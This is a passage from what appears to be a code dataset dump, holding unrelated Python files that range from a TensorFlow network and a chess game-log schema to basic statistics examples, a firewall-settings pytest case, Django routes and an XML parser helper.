1024\n\nx = tf.placeholder('float', [None, n_input])\ny = tf.placeholder('float', [None, n_class])\n\n#add lasso layer\ndiag_random = np.random.normal(0, 0.1, x.shape[1])\nMa_diag = np.diag(diag_random)\nweight_lasso = tf.Variable(Ma_diag)\nbias_lasso = tf.Variable(tf.random_normal([n_hidden_1]))\noutput_lasso = tf.add(tf.matmul(x, weight_lasso), bias_lasso)\nlayer_0 = tf.nn.relu(output_lasso)\n\ndef add_layer(inputs, a, b, act_Fun = None):\n weight = tf.Variable(tf.random_normal([a, b]))\n bias = tf.Variable(tf.random_normal([b]))\n y = tf.add(tf.matmul(inputs, weight), bias)\n keep = 0.5\n y = tf.nn.dropout(y, keep)\n \n if act_Fun is None:\n output = y \n else:\n output = act_Fun(y)\n \n return output\n\ndef multiplayer_perceptron(first_in):\n \n layer_1 = add_layer(first_in, n_input, n_hidden_1, act_Fun = tf.nn.relu)\n \n layer_2 = add_layer(layer_1, n_hidden_1, n_hidden_2, act_Fun = tf.nn.relu)\n \n layer_3 = add_layer(layer_2, n_hidden_2, n_hidden_3, act_Fun = tf.nn.relu)\n \n out_layer = add_layer(layer_3, n_hidden_3, n_class, act_Fun = tf.nn.softmax)\n \n return out_layer\n\npred = multiplayer_perceptron(layer_0)\n\nweight_lasso_sum = sum(map(sum,weight_lasso))\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, y) + Alpha * weight_lasso_sum)\n\noptimize = tf.train.AdamOptimizer(learning_rate).minimize(loss)\n\ninit = tf.initialize_all_variables()\ncorrect_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, 'float'))\n\nwith tf.Session() as sess:\n sess.run(init)\n \n for epoch in range(training_epochs):\n avg_loss = 0\n total_batch = int(n_sample / batch_size)\n for i in range(total_batch):\n _, c = sess.run([optimize, loss], \n feed_dict={x: x_train[i*batch_size : (i + 1)*batch_size, :], \n y: y_train[i*batch_size : (i + 1)*batch_size, :]})\n avg_loss += c / total_batch\n \n plt.plot(epoch + 1, avg_loss, 'co')\n \n if epoch % display_step == 0:\n print('Epoch:', '%04d' % (epoch + 1), 'cost=', '{:.9f}'.format(avg_loss))\n \n print('Opitimization Finished!')\n \n\n#Test\nacc = accuracy.eval({x: x_test, y: y_test})\nprint('Accuracy:', acc)\n\n#show on board\n\n#plt.xlabel('Epoch')\n# plt.ylabel('Loss')\n# plt.title('lr=%f, te=%d, bs=%d, acc=%f' % (learning_rate, training_epochs, batch_size, acc))\n# plt.tight_layout()\n# plt.savefig('cifar-10-batches-py / MLP-TF14-test.png', dpi=200)\n#\n# plt.show()\n","sub_path":"DNN_three layers_pro.py","file_name":"DNN_three layers_pro.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"547783402","text":"import time, copy, json\nfrom .utils import parse_pgn_instructions\n\n\nclass GameSchema:\n \n '''Holds, Loads, Converts records of games'''\n\n def __init__(self):\n \n self.pgn_instructions = None #str\n self.pgn_parsed = None #parsed triplets\n \n self.pgn_check_schedule = None\n self.pgn_capture_schedule = None\n self.pgn_mate_turn = None #as an i_turn\n self.pgn_player_last_move = None #\"who didnt resign\" 0=white, 1=black\n \n self.pgn_s_outcome = None #str from pgn file\n self.pgn_outcome_code = None\n \n self.doublet_instructions = None\n\n def to_json(self,**kwargs):\n \n data = {}\n\n data['pgn_instructions'] = self.pgn_instructions\n\n data['pgn_check_schedule'] = self.pgn_check_schedule\n data['pgn_capture_schedule'] = self.pgn_capture_schedule\n data['pgn_mate_turn'] = self.pgn_mate_turn\n data['pgn_player_last_move'] = self.pgn_player_last_move\n\n data['pgn_s_outcome'] = self.pgn_s_outcome\n \n return json.dumps(data)\n \n def from_json(self,json_data):\n \n k = 'pgn_instructions'\n if k in json_data:\n self.pgn_instructions = json_data[k]\n\n k = 'pgn_check_schedule'\n if k in json_data:\n self.pgn_check_schedule = json_data[k]\n\n k = 'pgn_capture_schedule'\n if k in json_data:\n self.pgn_capture_schedule = json_data[k]\n\n k = 'pgn_mate_turn'\n if k in json_data:\n self.pgn_mate_turn = json_data[k]\n\n k = 'pgn_player_last_move'\n if k in json_data:\n self.pgn_player_last_move = json_data[k]\n\n k = 'pgn_s_outcome'\n if k in json_data:\n self.pgn_s_outcome = json_data[k]\n \n \n def set_pgn_instructions(self, s_instructions):\n self.pgn_instructions = s_instructions\n\n def set_pgn_s_outcome(self, s_outcome):\n self.pgn_s_outcome = s_outcome\n\n def get_instructions(self):\n return str(self.pgn_instructions) #convert from unicode\n\n def get_pgn_parsed(self):\n return copy.copy(self.pgn_parsed)\n\n def get_check_schedule(self):\n return copy.copy(self.pgn_check_schedule)\n \n def get_capture_schedule(self):\n return copy.copy(self.pgn_capture_schedule)\n\n def get_mate_turn(self):\n return self.pgn_mate_turn\n\n def get_s_outcome(self):\n return self.pgn_s_outcome\n\n def get_player_last_move(self):\n return self.pgn_player_last_move\n\n \n def parse_pgn_instructions(self\n ,b_check_schedule=False\n ,b_capture_schedule=False\n ,b_mate_turn=False\n ,b_player_last_move=False\n ):\n\n #The main parsing: pgn triplets\n self.pgn_parsed = parse_pgn_instructions(self.pgn_instructions)\n \n #Secondary parsings\n if b_check_schedule:\n self.pgn_check_schedule = parse_pgn_instructions(\n self.pgn_instructions\n ,b_check_schedule=True\n )\n\n if b_capture_schedule:\n self.pgn_capture_schedule = parse_pgn_instructions(\n self.pgn_instructions\n ,b_capture_schedule=True\n )\n\n if b_mate_turn:\n self.pgn_mate_turn = parse_pgn_instructions(\n self.pgn_instructions\n ,b_mate_turn=True\n )\n if b_player_last_move:\n self.pgn_player_last_move = int(not(len(self.pgn_parsed) % 2))\n \n \n def all_parse_pgn_instructions(self):\n \n self.parse_pgn_instructions(b_check_schedule=True\n ,b_capture_schedule=True\n ,b_mate_turn=True\n ,b_player_last_move=True\n )\n\n @staticmethod\n def iturn_to_pgnturn(i_turn):\n ''' returns: (pgn_turn (int), player (int [0 or 1]) \n player: 0=white,1=black\n '''\n player_int = int(not(i_turn % 2))\n pgn_turn = ((i_turn - 1) // 2) + 1\n return (pgn_turn, player_int)\n\n @staticmethod\n def pgnturn_to_iturn(pgn_turn, player_int):\n ''' returns: i_turn (int)\n input: pgn_turn (int), player_int (int) 0=white,1=black\n '''\n return (pgn_turn * 2) - int(not(bool(player_int)))\n \n\n #TODO - create pgn from game record\n\n def parse_full_pgn_markdown(self,**kwargs):\n pass\n\n def make_doublet_from_pgn(self):\n pass\n\n\ndef test_schema_turn_convert():\n \n gs = GameSchema()\n \n assert gs.pgnturn_to_iturn(4,1) == 8 \n assert gs.pgnturn_to_iturn(4,0) == 7\n assert gs.pgnturn_to_iturn(1,0) == 1\n\n assert gs.iturn_to_pgnturn(1) == (1,0)\n assert gs.iturn_to_pgnturn(2) == (1,1)\n assert gs.iturn_to_pgnturn(17) == (9,0)\n assert gs.iturn_to_pgnturn(16) == (8,1)\n \ndef test_schema_check_schedule():\n \n gs = GameSchema()\n \n s_pgn = '1. c4 Nf6 2. Nc3 g6'\n gs.set_pgn_instructions(s_pgn)\n gs.all_parse_pgn_instructions()\n assert gs.get_check_schedule() == [False, False, False, False]\n\n s_pgn = '1. Nf3 e6 2. c4 b6 3. g3 Bb7 4. Bg2 c5 5. O-O Nf6 6. Nc3 Be7 7. d4 cxd4 8. Qxd4 Nc6 9. Qf4 O-O 10. Rd1 Qb8 11. e4 d6 12. b3 a6 13. Bb2 Rd8 14. Qe3 Qa7 15. Ba3 Bf8 16. h3 b5 17. Qxa7 Nxa7 18. e5 dxe5 19. Bxf8 Kxf8 20. Nxe5 Bxg2 21. Kxg2 bxc4 22. bxc4 Ke8 23. Rab1 Rxd1 24. Nxd1 Ne4 25. Rb7 Nd6 26. Rc7 Nac8 27. c5 Ne4 28. Rxf7 Ra7 29. Rf4 Nf6 30. Ne3 Rc7 31. Rc4 Ne7 32. f4 Nc6 33. N3g4 Nd5 34. Nxc6 Rxc6 35. Kf3 Rc7 36. Ne5 Kd8 37. c6 Ke7 38. Ra4 Ra7 39. Kf2 Kd6 40. h4 a5 41. Kf3 Nc3 42. Rd4+ Nd5 43. Ke4 g6 44. g4 Kc7 45. Rd2 a4 46. f5 Nf6+ 47. Kf4 exf5 48. gxf5 Ra5 49. fxg6 hxg6 50. Rb2 Nd5+ 51. Ke4 Nb6 52. Rf2 a3 53. Rf7+ Kc8 54. Nxg6 Ra4+ 55. Ke5 Rb4 56. Ne7+ Kd8 57. c7+ Ke8 58. Rh7 Rc4 59. Nd5 Rc5 60. Rh8+ Kd7 61. Rd8+'\n gs.set_pgn_instructions(s_pgn)\n gs.parse_pgn_instructions(b_check_schedule=True)\n\n base = [False] * (60*2 + 1)\n base[83 - 1] = True\n base[92 - 1] = True\n base[100 - 1] = True\n base[105 - 1] = True\n base[108 - 1] = True\n base[111 - 1] = True\n base[113 - 1] = True\n base[119 - 1] = True\n base[121 - 1] = True\n\n assert gs.get_check_schedule() == base\n\ndef test_schema_capture_schedule():\n \n gs = GameSchema()\n\n s_pgn = '5. O-O Nf6 6. Nc3 Be7 7. d4 cxd4 8. Qxd4'\n gs.set_pgn_instructions(s_pgn)\n gs.all_parse_pgn_instructions()\n\n assert gs.get_capture_schedule() == [False, False, False, False, False, True, True]\n\ndef test_schema_mate_turn():\n pass\n\ndef test_schema_player_last_move():\n \n gs = GameSchema()\n\n s_pgn = '1. Nf3 e6 2. c4 b6 3. g3 Bb7 4. Bg2 c5 5. O-O Nf6 6. Nc3 Be7 7. d4 cxd4 8. Qxd4 Nc6 9. Qf4 O-O 10. Rd1 Qb8 11. e4 d6 12. b3 a6 13. Bb2 Rd8 14. Qe3 Qa7 15. Ba3 Bf8 16. h3 b5 17. Qxa7 Nxa7 18. e5 dxe5 19. Bxf8 Kxf8 20. Nxe5 Bxg2 21. Kxg2 bxc4 22. bxc4 Ke8 23. Rab1 Rxd1 24. Nxd1 Ne4 25. Rb7 Nd6 26. Rc7 Nac8 27. c5 Ne4 28. Rxf7 Ra7 29. Rf4 Nf6 30. Ne3 Rc7 31. Rc4 Ne7 32. f4 Nc6 33. N3g4 Nd5 34. Nxc6 Rxc6 35. Kf3 Rc7 36. Ne5 Kd8 37. c6 Ke7 38. Ra4 Ra7 39. Kf2 Kd6 40. h4 a5 41. Kf3 Nc3 42. Rd4+ Nd5 43. Ke4 g6 44. g4 Kc7 45. Rd2 a4 46. f5 Nf6+ 47. Kf4 exf5 48. gxf5 Ra5 49. fxg6 hxg6 50. Rb2 Nd5+ 51. Ke4 Nb6 52. Rf2 a3 53. Rf7+ Kc8 54. Nxg6 Ra4+ 55. Ke5 Rb4 56. Ne7+ Kd8 57. c7+ Ke8 58. Rh7 Rc4 59. Nd5 Rc5 60. Rh8+ Kd7 61. Rd8+'\n gs.set_pgn_instructions(s_pgn)\n gs.all_parse_pgn_instructions()\n\n assert gs.get_player_last_move() == 0\n\n\nclass GameLog:\n\n ''' Holds all data collected within the game.\n Used as data-structure when returned from a test. '''\n\n def __init__(self,**kwargs):\n \n #TODO - remove these\n self.board_pre_turn = True\n self.board_pre_turn_oppoenent = kwargs.get('b_log_show_opponent', False)\n self.manual_control = kwargs.get('manual_control', ())\n \n \n # Used to turn on all logs at once\n self.b_full_log = kwargs.get('b_full_log', False)\n _all = self.b_full_log \n \n self.b_check_schedule = kwargs.get('b_check_schedule', False) or _all\n self.log_check_schedule = []\n \n self.b_log_move = kwargs.get('b_log_move', False) or _all\n self.log_move = []\n \n self.b_num_available = kwargs.get('b_num_available',False) or _all\n self.log_num_available = []\n\n self.b_num_pieces = kwargs.get('b_num_pieces', False) or _all\n self.log_num_pieces = []\n\n self.b_num_player_pieces = kwargs.get('b_num_player_pieces', False) or _all\n self.log_num_player_pieces = []\n\n self.b_num_pieces = kwargs.get('b_num_player_pieces', False) or _all\n self.log_num_player_pieces = []\n\n self.b_num_irregular = kwargs.get('b_num_irregular', False) or _all\n self.log_num_irregular = []\n\n self.b_num_king_moves = kwargs.get('b_num_king_moves', False) or _all\n self.log_num_king_moves = []\n \n self.b_turn_time = kwargs.get('b_turn_time',False)\n self.log_turn_time = []\n self.t0 = time.time()\n\n \n\n def set_t0(self):\n self.t0 = time.time()\n\n def add_turn_log(self\n ,move\n ,moves\n ,pieces\n ,player\n ,b_check = False\n ):\n \n '''each turn append a data element on to each of these logs'''\n\n if self.b_log_move:\n self.log_move.append(move)\n \n if self.b_num_available:\n self.log_num_available.append(len(moves))\n\n if self.b_check_schedule:\n self.log_check_schedule.append(b_check)\n\n if self.b_num_pieces:\n num_pieces = len(pieces)\n self.log_num_pieces.append(num_pieces)\n\n if self.b_num_player_pieces:\n num_player_pieces = len([p for p in pieces if p.white==player])\n self.log_num_player_pieces.append(num_player_pieces)\n\n if self.b_num_irregular:\n num_irregular = 0 #len(filter(lambda m: m.move_code != \"REGULAR\", moves))\n self.log_num_irregular.append(num_irregular)\n\n if self.b_num_king_moves:\n num_king_moves = 0 \n self.log_num_king_moves.append(num_king_moves)\n \n if self.b_turn_time:\n _time = time.time() - self.t0\n self.log_turn_time.append(_time)\n self.t0 = time.time()\n\n\n def get_log_move(self):\n return copy.deepcopy(self.log_move)\n\n def get_log_num_available(self):\n return copy.deepcopy(self.log_num_available)\n\n def get_log_turn_time(self):\n return copy.deepcopy(self.log_turn_time)\n\n def get_log_check_schedule(self):\n return copy.copy(self.log_check_schedule)\n\n def get_log_num_pieces(self):\n return copy.copy(self.log_num_pieces)\n\n def get_log_num_player_pieces(self):\n return copy.copy(self.log_num_player_pieces)\n\n def get_log_num_irregular(self):\n return copy.copy(self.log_num_irregular)\n\n \n \n","sub_path":"basic_engine/src/GameLog.py","file_name":"GameLog.py","file_ext":"py","file_size_in_byte":11531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"119470407","text":"N = int(input()) #사람 수\na = [0] + list(map(int,input().split())) #잃는 체력\nb = [0] + list(map(int,input().split())) #얻는 기쁨\ndp = [[0]*100 for _ in range(N+1)]\nfor i in range(1,N+1) :\n for j in range(100) :\n if j+a[i] < 100 :\n dp[i][j+a[i]] = dp[i-1][j] + b[i]\n if dp[i][j] < dp[i-1][j] :\n dp[i][j] = dp[i-1][j]\nprint(dp[N][99])\n","sub_path":"안녕.py","file_name":"안녕.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"579102646","text":"adressbuch = [{'Vorname':'Max', 'Nachname':'Mustermann', 'Hobbies': ('Schwimmen','Tanzen','Lesen'), 'Alter': 43,\n 'Eigenschaften' : {'Geschicklichkeit': 10, 'IQ':98, 'Gewicht':88, 'Haarfarbe':'blond'},'Geschlecht':'männlich'}]\n\nIQ = adressbuch [0] ['Eigenschaften'] ['IQ']\n\nprint (IQ)\n\n\nnumber_hobbies = len(adressbuch [0] ['Hobbies'])\n\nprint (number_hobbies)\n\nadressbuch.append ({'Vorname':'Pia', 'Nachname': 'Musterfrau', 'Alter': 34, 'Geschlecht': 'w', 'Hobbies': ('Wandern', 'Tanzen', 'Skydiving'),\n 'Eigenschaften': {'Geschicklichkeit' : 9, 'IQ' : 102, 'Gewicht' : 68, 'Haarfarbe' : 'brünett'}, 'Organisationen' : 'PyLadies'})\n\nlength_adress= len(adressbuch)\n\nprint (length_adress)","sub_path":"CBTJ/Aufgabe2.py","file_name":"Aufgabe2.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"151965531","text":"#!/usr/bin/env python3\n__doc__ = \"\"\"\nSynaptor Processing Tasks\n\"\"\"\n\nimport time\n\nfrom .. import io\nfrom .. import types\nfrom .. import seg_utils\n\nfrom . import chunk_ccs\nfrom . import merge_ccs\nfrom . import chunk_edges\nfrom . import merge_edges\nfrom . import chunk_overlaps\nfrom . import merge_overlaps\n\n\ndef timed(fn_desc, fn, *args, **kwargs):\n \"\"\" Measures the execution time of the passed fn \"\"\"\n print(\"{fn_desc}\".format(fn_desc=fn_desc))\n start = time.time()\n result = fn(*args, **kwargs)\n print(\"{fn_desc} complete in {t:.3f}s\".format(fn_desc=fn_desc,\n t=time.time()-start))\n return result\n\n\ndef chunk_ccs_task(net_output, chunk_begin, chunk_end,\n cc_thresh, sz_thresh):\n \"\"\"\n - Performs connected components over a chunk of data\n - Extracts clefts that possibly continue to the next chunk (continuations)\n - Filters out any complete segments under the size threshold\n - Records the centroid, size, and bounding box for the surviving\n clefts in a DataFrame\n\n Returns:\n - Cleft Components (3d np array)\n - Continuations for the chunk\n - DataFrame of cleft info\n \"\"\"\n chunk_bounds = types.BBox3d(chunk_begin, chunk_end)\n\n #Processing\n ccs = timed(\"Running connected components\",\n chunk_ccs.connected_components3d,\n net_output, cc_thresh).astype(\"uint32\")\n\n\n continuations = timed(\"Extracting continuations\",\n types.continuation.extract_all_continuations,\n ccs)\n cont_ids = set(cont.segid for cont in continuations)\n\n\n ccs, sizes = timed(\"Filtering complete segments by size\",\n seg_utils.filter_segs_by_size,\n ccs, sz_thresh, to_ignore=cont_ids)\n\n\n offset = chunk_bounds.min()\n centers = timed(\"Computing cleft centroids\",\n seg_utils.centers_of_mass,\n ccs, offset=offset)\n bboxes = timed(\"Computing cleft bounding boxes\",\n seg_utils.bounding_boxes,\n ccs, offset=offset)\n\n cleft_info = timed(\"Making cleft info DataFrame\",\n chunk_ccs.make_cleft_info_dframe,\n centers, sizes, bboxes)\n\n return ccs, continuations, cleft_info\n\n\ndef merge_ccs_task(cont_info_arr, cleft_info_arr, chunk_bounds,\n size_thr, max_face_shape):\n \"\"\"\n -Assigns a global set of cleft segment ids\n -Finds which continuations match across chunks\n -Makes an id mapping that merges the matching continuations for each chunk\n -Merges the cleft info dataframes into one for the entire dataset\n -Maps any newly merged cleft segments to 0 if they're under the\n size threshold\n\n Returns:\n -A single DataFrame for all merged clefts\n -A nparray of id maps for each chunk\n \"\"\"\n\n cons_cleft_info, chunk_id_maps = timed(\"Consolidating cleft dataframes\",\n merge_ccs.consolidate_cleft_info_arr,\n cleft_info_arr)\n\n cont_info_arr = timed(\"Applying chunk_id_maps to continuations\",\n merge_ccs.apply_chunk_id_maps,\n cont_info_arr, chunk_id_maps)\n\n cont_id_map = timed(\"Merging connected continuations\",\n merge_ccs.merge_connected_continuations,\n cont_info_arr, max_face_shape)\n\n chunk_id_maps = timed(\"Updating chunk id maps\",\n merge_ccs.update_chunk_id_maps,\n chunk_id_maps, cont_id_map)\n\n cons_cleft_info = timed(\"Merging cleft dataframes\",\n merge_ccs.merge_cleft_df,\n cons_cleft_info, cont_id_map)\n\n size_thr_map = timed(\"Enforcing size threshold over merged ccs\",\n merge_ccs.enforce_size_threshold,\n cons_cleft_info, size_thr)\n\n chunk_id_maps = timed(\"Updating chunk id maps (for size thresholding)\",\n merge_ccs.update_chunk_id_maps,\n chunk_id_maps, size_thr_map)\n\n return cons_cleft_info, chunk_id_maps\n\n\ndef chunk_edges_task(img, clefts, seg, asynet,\n chunk_begin, chunk_end, patchsz,\n wshed=None, num_samples_per_cleft=2,\n dil_param=5, id_map=None):\n \"\"\"\n -Applies an id map to a chunk (if passed)\n NOTE: Modifies the clefts array if id_map exists\n -Applies an assignment network to each cleft in the chunk\n -Computes the sizes of each cleft to assist later thresholding\n -Returns all of the computed information in a DataFrame\n\n Returns:\n -A DataFrame of info for each edge within this chunk\n \"\"\"\n\n chunk_bounds = types.BBox3d(chunk_begin, chunk_end)\n\n if id_map is not None:\n clefts = timed(\"Remapping cleft ids\",\n seg_utils.relabel_data,\n clefts, id_map, copy=False)\n\n offset = chunk_bounds.min()\n edges = timed(\"Inferring edges\",\n chunk_edges.infer_edges,\n asynet, img, clefts, seg,\n offset, patchsz, samples_per_cleft=num_samples_per_cleft,\n wshed=wshed, dil_param=dil_param)\n\n edges = timed(\"Computing cleft size and adding to edge dframe\",\n chunk_edges.add_cleft_sizes,\n edges, clefts)\n\n return edges\n\n\ndef merge_edges_task(edges_arr, merged_cleft_info,\n voxel_res, dist_thr, size_thr):\n \"\"\"\n -Maps together any edges that connect the same partners\n and are within some distance apart\n -Maps any newly merged cleft segments to 0 if they're under the\n size threshold\n\n Returns:\n -Combined cleft & edge dataframe\n -An id map that implements the duplicate and sz mapping\n -A merged edge dataframe (mostly for debugging along with #1)\n \"\"\"\n\n merged_edge_df = timed(\"Merging edges\",\n merge_edges.consolidate_edges1,\n edges_arr)\n\n full_df = timed(\"Merging edge DataFrame to cleft DataFrame\",\n merge_edges.merge_to_cleft_df,\n merged_cleft_info, merged_edge_df)\n\n dup_id_map = timed(\"Merging duplicate clefts\",\n merge_edges.merge_duplicate_clefts2,\n full_df, dist_thr, voxel_res)\n\n full_df = timed(\"Merging duplicates within full dataframe\",\n merge_edges.merge_full_df1,\n full_df, dup_id_map)\n\n size_thr_map = timed(\"Enforcing size threshold over merged ccs\",\n merge_ccs.enforce_size_threshold,\n full_df, size_thr)\n\n merged_id_map = timed(\"Updating duplicate id map with size threshold map\",\n merge_edges.update_id_map,\n dup_id_map, size_thr_map)\n\n return full_df, merged_id_map, merged_edge_df\n\n\ndef chunk_overlaps_task(segs_of_interest, base_segs):\n \"\"\"\n -Determines which segments of interest overlap with\n which base segs, returns the overlap matrix\n \"\"\"\n return timed(\"Counting overlaps\",\n chunk_overlaps.count_overlaps,\n segs_of_interest, base_segs)\n\n\ndef merge_overlaps_task(overlaps_arr):\n \"\"\"\n -Merges the chunk overlap matrices into one,\n -Returns a mapping from segment to base segment of max overlap\n \"\"\"\n full_overlap = timed(\"Merging overlap matrices\",\n merge_overlaps.consolidate_overlaps,\n overlaps_arr)\n\n return timed(\"Finding segments with maximal overlap\",\n merge_overlaps.find_max_overlaps,\n full_overlap)\n\n\ndef remap_ids_task(clefts, *id_maps, copy=False):\n \"\"\"\n -Maps the ids within clefts according to a list of id_maps\n NOTE: id maps will be applied in the order listed as args\n\n Returns:\n -Remapped clefts\n \"\"\"\n\n id_map = id_maps[0]\n for (i,next_map) in enumerate(id_maps[1:]):\n id_map = timed(\"Updating id map: round {i}\".format(i=i+1),\n merge_edges.update_id_map,\n id_map, next_map, reused_ids=True)\n\n clefts = timed(\"Relabeling data by id map\",\n seg_utils.relabel_data,\n clefts, id_map, copy=copy)\n\n return clefts\n","sub_path":"synaptor/proc_tasks/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":8431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"577766654","text":"import pytest\r\nimport time\r\nimport sys\r\nfrom os.path import dirname, abspath\r\nsys.path.insert(0, dirname(dirname(abspath(__file__))))\r\nfrom page_obj.scg.scg_def_sys import *\r\nfrom page_obj.scg.scg_def import *\r\nfrom page_obj.scg.scg_button import *\r\nfrom page_obj.scg.scg_def_log import *\r\nfrom page_obj.common.rail import *\r\nfrom page_obj.scg.scg_dev import *\r\nfrom page_obj.scg.scg_def_ifname_OEM import *\r\ntest_id = 139342\r\n# 未通过测试\r\n\r\ndef test_c139342(browser):\r\n\ttry:\r\n\t\t# 登录函数\r\n\t\tlogin_web(browser, url=dev1)\r\n\t\tconfiguer(browser)\r\n\t\tloginfo = get_log(browser, 管理日志)\r\n\t\t# print(loginfo)\r\n\r\n\t\ttry:\r\n\t\t\tassert \"修改\" in loginfo\r\n\t\t\tassert \"设置成功\" in loginfo\r\n\t\t\trail_pass(test_run_id, test_id)\r\n\r\n\t\texcept:\r\n\t\t\trail_fail(test_run_id, test_id)\r\n\t\t\tassert \"修改\" in loginfo\r\n\t\t\tassert \"设置成功\" in loginfo\r\n\r\n\t\tsys_set_jyl(browser)\r\n\t\tfor x in range(1, 5):\r\n\t\t\tbrowser.refresh()\r\n\t\tlogin_web(browser, url=dev1)\r\n\r\n\texcept Exception as err:\r\n\t\t# 如果上面的步骤有报错,重新设备,恢复配置\r\n\t\tprint(err)\r\n\t\treload(hostip=dev1)\r\n\t\treload(hostip=dev1, port=33)\r\n\t\trail_fail(test_run_id, test_id)\r\n\t\tassert False\r\n\r\n\r\ndef configuer(browser):\r\n\tsys_set_jyl(browser, ssh_port=\"33\", ssh_timeout=\"86400\", https_port=\"446\", https_timeout=\"86400\",\r\n\t telent_port=\"23\", telent_timeout=\"86400\", console_timeout=\"86400\", frozen_time=\"600\",\r\n\t expire_time=\"600\", retry=\"3\")\r\n\t# time.sleep(30)\r\n\tfor x in range(1, 5):\r\n\t\tbrowser.refresh()\r\n\ttime.sleep(2)\r\n\tlogin_web(browser, url=dev1+str(\":446\"))\r\n\r\n\r\nif __name__ == '__main__':\r\n\tpytest.main([\"-v\", \"-s\", \"test_c\" + str(test_id) + \".py\"])","sub_path":"pyautoTest-master(ICF-7.5.0)/test_case/scg/scg_Administrator/test_c139342.py","file_name":"test_c139342.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"508150551","text":"input = open('jaberwocky.txt', 'r')\ninputtemp = input.readlines()\ninputtempnumberoflines = sum(1 for line in inputtemp)\nprint(inputtempnumberoflines)\noutputtemp=[]\nfor i in range(1, inputtempnumberoflines, 2):\n outputtemp.append(inputtemp[i])\nprint(outputtemp)\noutputtempnumberoflines = sum(1 for i in outputtemp)\nf = open('output.txt', 'w')\nfor i in range(0,outputtempnumberoflines):\n f.write(outputtemp[i])\nf.close()\n","sub_path":"workingwithfiles.py","file_name":"workingwithfiles.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"358420032","text":"## =================\nimport numpy as np\n\nincomes = np.random.normal(27000, 15000, 10000)\nnp.mean(incomes)\n## ==========================================\n#%matplotlib inline\nimport matplotlib.pyplot as plt\nplt.hist(incomes, 50)\nplt.show()\n##==============================================\nnp.median(incomes)\n## if you add suppose a big number in the income list, The median won't change much, but the mean does.\nincomes = np.append(incomes, [1000000000])\nnp.median(incomes)\nnp.mean(incomes)\n## ===================mode============================\n## mode only works for discrete data\nages = np.random.randint(18, high=90, size=500)\nages\n\nfrom scipy import stats\nstats.mode(ages)\n\n##==============================================================\n## The code that will generate some random e-commerce data; just an array of total amount spent per transaction\n#%matplotlib inline\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nincomes = np.random.normal(100.0, 20.0, 10000)\n\nplt.hist(incomes, 50)\nplt.show()\n##==============================================================\n","sub_path":"3.measures_of_central_tendency.py","file_name":"3.measures_of_central_tendency.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"143853662","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom pandora_world import views\n\nrouter = DefaultRouter()\nrouter.register('companies', views.PandoraCompaniesViewSet)\nrouter.register('people', views.PandoraPeopleViewSet)\nrouter.register('food', views.PandoraFoodViewSet)\n\napp_name = 'pandora'\n\nurlpatterns = [\n path('', include(router.urls)),\n]","sub_path":"app/pandora_world/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"318014081","text":"'''\nCreated on 19 Eyl 2014\n\n@author: Mithat KONUK\n'''\n\n# Set and get information from xml parser\n\n#!/usr/bin/env python\n\nfrom xml.etree import ElementTree as ET\nimport enum\nfrom enum import getPath\n\n\n \nclass XMLParser():\n \n # root : example ....\n def setRoot(self,nameofRoot):\n self.root = ET.Element(nameofRoot)\n \n def getRoot(self):\n return self.root\n \n ''' \n parent : add subElement to root element\n subElement: added subElement tag name \n subElementText (String): subElementtext \n attribute : dictionary about the tag attribute : \n \n \n return addedSubElement, this way can add into another subElement \n Exception : Tag name must be non empty\n \n ''' \n def addSubElement(self,parent,subElement,ssubElementtext,attribute):\n \n \n if subElement == '' or subElement is None:\n raise Exception('Tag name must be non empty')\n else : \n addedSubElement = ET.SubElement(parent,subElement)\n addedSubElement.text = ssubElementtext\n \n for key,value in attribute.iteritems():\n addedSubElement.set(key,value)\n \n return addedSubElement\n \n \n '''\n taglist ==> {tag:,text:,attrib...} this format is standart\n example : { 'tag':'api','text':'WintoFile','os':'win8'}\n empty field = set empty ==> ''\n \n '''\n def append(self,filename,tagdict):\n root = ET.parse(filename).getroot()\n \n coupleList =[]\n for key,value in tagdict.iteritems():\n temp = [key,value]\n coupleList.append(temp)\n \n \n stagName = ''\n stextValue =''\n attributeDict=dict()\n \n \n for list in coupleList:\n \n if list[0] == 'tag':\n stagName = list[1]\n elif list[0] == 'text':\n stextValue = list[1]\n else:\n # add attrib \n attributeDict[list[0]] = list[1]\n \n if stagName == '' or stagName is None:\n raise Exception('Empty Tag Expression encountered') # tag:'' girilirse tag olusturulamaz\n \n else:\n child = ET.Element(stagName)\n child.text = stextValue\n \n for key,value in attributeDict.iteritems():\n child.set(key,value)\n \n root.append(child)\n tree = ET.ElementTree(root)\n tree.write(filename) # update xml file\n \n \n # set root and write as a xml file \n def createXMLFile(self,xmlFileName):\n tree = ET.ElementTree(self.root)\n tree.write(xmlFileName)\n \n \n '''\n return list of tag\n [[tag_text,{attrib}],..]\n '''\n def getElementsByTag(self,filename,tag):\n root = ET.parse(filename).getroot()\n elementlist = []\n \n for element in root.iter(tag):\n itemlist = []\n itemlist.append(element.text)\n itemlist.append(element.attrib)\n elementlist.append(itemlist)\n return elementlist\n \n \n '''\n Return tag values as list \n value\n \n getElementTextByTag ==> []\n ''' \n def 